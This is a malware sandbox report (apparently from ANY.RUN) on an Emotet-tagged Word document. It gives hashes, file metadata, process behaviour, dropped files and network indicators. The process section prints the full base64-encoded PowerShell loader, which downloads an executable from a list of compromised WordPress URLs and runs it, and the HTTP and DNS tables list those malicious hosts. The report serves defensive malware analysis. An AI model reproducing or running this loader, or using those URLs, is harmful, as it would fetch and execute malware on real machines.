analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

038827719921319805.doc

Full analysis: https://app.any.run/tasks/cc4edbae-c604-42ac-ab97-cda250eae7ca
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 15:31:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Interactions, Subject: International, Author: Shanny Nader, Keywords: Total, Comments: Networked, Template: Normal.dotm, Last Saved By: Dereck Pacocha, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:00:00 2019, Last Saved Time/Date: Mon Oct 14 15:00:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5:

0D6CB6315C5470131560A2F461734163

SHA1:

19BAEB888D6CD58610A0B64A91453321C83F2AD1

SHA256:

A4AFFE707D20A6AE831E018ABF97987CF6CB17B032E137D548344265F7D61E20

SSDEEP:

3072:lPHuhowKgdzSrGsKyIwLx3GoRaWOcIBOaOhi1o5lE8COrg12bKDmwf9EJZ:lPHuhowKUzSHnLx3GoAWOJQaOhi1wKP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2444)
    • Creates files in the user directory

      • powershell.exe (PID: 2444)
    • PowerShell script executed

      • powershell.exe (PID: 2444)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1576)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1576)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Grady
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 201
Paragraphs: 1
Lines: 1
Company: Hayes, Kulas and Zieme
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 172
Words: 30
Pages: 1
ModifyDate: 2019:10:14 14:00:00
CreateDate: 2019:10:14 14:00:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Dereck Pacocha
Template: Normal.dotm
Comments: Networked
Keywords: Total
Author: Shanny Nader
Subject: International
Title: Interactions
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1576"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\038827719921319805.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2444powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhAGUAZgA3ADYANQA1ADEAMwAxADAAZQA0ADMAPQAnAGEAMAB4AGMAYQAxAGMAYQBkAGYAOQA2ADgAMAAyADIAJwA7ACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACAAPQAgACcANAA3ADIAJwA7ACQAYQAwAHgAZABjADQAYwAxADIAYQA3AGUAMwA5ADgAPQAnAGEAMAB4AGUAYQA4ADUAOABhADYAMAA3ADMAZABlADUAMQBkACcAOwAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4AGYAZQA0ADMAMgAwADcANAA5ADIAMwAzADkAMQA9ACcAYQAwAHgAMgA4AGQANwBjADkAYQA2AGQANAAwAGYAJwA7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBuAHQAOwAkAGEAMAB4ADEANQA4ADcAOQAzADQAMAAxAGIAZAAyADQAOAA9ACcAaAB0AHQAcAA6AC8ALwBhAG4AZAByAGUAdwBzAGkAYwBlAGwAbwBmAGYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGMAagAyAGQAMAAwADAAOQAvACoAaAB0AHQAcAA6AC8ALwBiAGUAYQBuAHMAbQBlAGQAaQBhAC4AYwBvAG0ALwB6AGUAdQBzADEANgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHQAdQBiAGEAdwA1AHkAMwA1AC8AKgBoAHQAdABwADoALwAvAGEAYgBoAGkAZABoAGEAbQBtAGEAcwBvAGMAaQBlAHQAeQAuAGMAbwBtAC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwBpAGgAMwB2AHoAZABjADkALwAqAGgAdAB0AHAAOgAvAC8AcABjAGYAMAA4AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAyADQANAA3AC8AKgBoAHQAdABwADoALwAvAGEAYwBxAHUAaQByAGkAbgBnAC0AdABhAGwAZQBuAHQALgBjAG8AbQAvAGQAcABhAGoALwAwADUAZwBkADUANwA1AC8AJwAuACIAcwBwAGAATABpAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADgAOQA5ADAAYQA5AGQANABiAGEAMQAwAGUANwA9ACcAYQAwAHgAZQAxADgAMAAzADgAZgBjADYANQAzAGQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAYQAwAHgAMABmADcAYgA2AGQAZQA3ADUANQAgAGkAbgAgACQAYQAwAHgAMQA1ADgANwA5ADMANAAwADEAYgBkADIANAA4ACkAewB0AHIAeQB7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYALgAiAGQATwB3AE4AbABgAG8AQQBgAGQAYABGAGkAbABlACIAKAAkAGEAMAB4ADAAZgA3AGIANgBkAGUANwA1ADUALAAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkAOwAkAGEAMAB4ADgAMQBkADkAOQBhADgANwBiADEAZAA9ACcAYQAwAHgANgBiAGIAMwAyADAANQBlADcAMwA4ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkALgAiAEwARQBOAGAARwBUAEgAIgAgAC0AZwBlACAAMgAxADMANwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgBUACIAKAAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAApADsAJABhADAAeABjADkANAA1AGYAZQBlAGEAOQBmAD0AJwBhADAAeAA1AGEAYwBmADUAYwBiADYAYQBhACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4ADAAZQA0ADkAZgBlAGYAMwA1ADIAPQAnAGEAMAB4ADkAZABjAGEANQA5AGUAZgA0AGEANAAzADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAZgA5ADUANAA5ADYAYQA4ADEAYwA0ADkANAA9ACcAYQAwAHgANgBkADcAZQAyADgAZQAwAGEAMQA2ACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 876
Read events
1 083
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
1576WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA766.tmp.cvr
MD5:
SHA256:
2444powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IU2LKOK3PUCN6D6U1PQP.temp
MD5:
SHA256:
1576WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1DE80B08.wmfwmf
MD5:FE7EBD52C61E04D269DE5F81C7AAF35C
SHA256:2DE76E1D337AAD6CD5FF63163C474509C0595DD29AF371C2A23651C4A3C455D8
1576WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\43FF8E56.wmfwmf
MD5:FD620F8B402C75F9499CABA0A4B321E9
SHA256:6F170588DC7E228650BDC92A01D0A37ADE594DCDB40679676B38E15792128F64
1576WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5F7AE463.wmfwmf
MD5:CFB180FF4C12C87A459B2D1DEAC6A577
SHA256:558D6CBF5C940E55C9901E4DCDADF4F79E8671C08CA4C12E3E0338D3BAD5FF26
1576WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:232C95F063EB4B4E96674E371F41D5EE
SHA256:D69FBD77D194718F34082C2306AE0C1F665EDA316C00F60D65080D96367E6BF3
1576WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D167E5F.wmfwmf
MD5:7782D41F34F674456419B82E767B5DB9
SHA256:6845F745502BAB7956674EE5ACF5CF117E1D570ED8B92D81EA19F2DB9EF7AAE2
1576WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$8827719921319805.docpgc
MD5:1D13E4944DF84A5474C082640257E3EB
SHA256:CE4ADEC8032E55E309093E7BF6D97970D6AD5167AC0049C442B7B3C851770C76
1576WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33511BFC.wmfwmf
MD5:47A5007B6BADF231D6B47BFED74B9494
SHA256:70E1EDD67D5607165B6576A3D2F7CF174A3896DF8FCD9E3E8B5E4FA1235AAF4F
1576WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:290CC50798306F3595800766B70EBD87
SHA256:D48C76BEC04DE0AEC49BB36251E0EB486D4CC516C20033C4F0457F7A74067EEC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2444
powershell.exe
GET
404
62.210.16.61:80
http://pcf08.com/wp-content/02447/
FR
xml
345 b
malicious
2444
powershell.exe
GET
404
149.210.131.83:80
http://beansmedia.com/zeus16/wp-includes/tubaw5y35/
NL
xml
345 b
suspicious
2444
powershell.exe
GET
404
173.236.169.124:80
http://abhidhammasociety.com/wp-snapshots/ih3vzdc9/
US
xml
345 b
unknown
2444
powershell.exe
GET
404
199.204.248.102:80
http://andrewsiceloff.com/wp-admin/cj2d0009/
US
xml
345 b
suspicious
2444
powershell.exe
GET
404
166.62.28.141:80
http://acquiring-talent.com/dpaj/05gd575/
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2444
powershell.exe
149.210.131.83:80
beansmedia.com
Transip B.V.
NL
suspicious
2444
powershell.exe
173.236.169.124:80
abhidhammasociety.com
New Dream Network, LLC
US
unknown
2444
powershell.exe
166.62.28.141:80
acquiring-talent.com
GoDaddy.com, LLC
US
malicious
2444
powershell.exe
62.210.16.61:80
pcf08.com
Online S.a.s.
FR
malicious
2444
powershell.exe
199.204.248.102:80
andrewsiceloff.com
CONTINENTAL BROADBAND PENNSYLVANIA, INC.
US
suspicious

DNS requests

Domain
IP
Reputation
andrewsiceloff.com
  • 199.204.248.102
suspicious
beansmedia.com
  • 149.210.131.83
suspicious
abhidhammasociety.com
  • 173.236.169.124
unknown
pcf08.com
  • 62.210.16.61
malicious
acquiring-talent.com
  • 166.62.28.141
malicious

Threats

No threats detected
No debug info